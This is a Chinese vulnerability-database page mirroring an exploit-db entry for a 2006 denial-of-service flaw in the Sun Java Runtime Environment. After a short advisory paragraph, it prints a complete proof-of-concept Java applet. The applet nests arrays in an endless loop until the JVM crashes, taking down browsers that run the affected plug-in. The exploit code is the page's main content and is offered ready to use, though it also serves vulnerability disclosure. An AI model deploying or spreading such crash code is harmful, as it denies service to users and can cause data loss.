Sun Java Runtime Environment 1.3/1.4/1.5 - Nested Array Objects Denial of Service

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055715 漏洞类型
发布时间 2006-05-22 更新时间 2006-05-22
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/27901
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/18058/info

The Sun Java Runtime Environment is vulnerable to a denial-of-service vulnerability. This issue is due to the software's failure to handle exceptional conditions. 

This issue is reported to affect Java Runtime Environment versions up to 1.4.2_11 and 1.5.0_06. This issue will crash Internet browsers running an affected Java plug-in. 

An attacker may exploit this issue to cause a vulnerable application -- as well as all processes spawned from the application -- to crash, denying service to legitimate users. Due to the scope of the crash, data loss may occur.

public class MemApplet extends java.applet.Applet{ 
/* (c) Marc Schoenefeld */ 
static Object o = null; 
public static void main(String[] args) { 
(new MemApplet()).doit(); 
} 
public void paint(java.awt.Graphics p) { 
(new MemApplet()).doit(); } 
void doit () { 
while (true) try { Object[] oarr = {o}; o = oarr; } catch (Throwable t) { o = null; System.out.println("Wurfgeschoss: " + t); } } }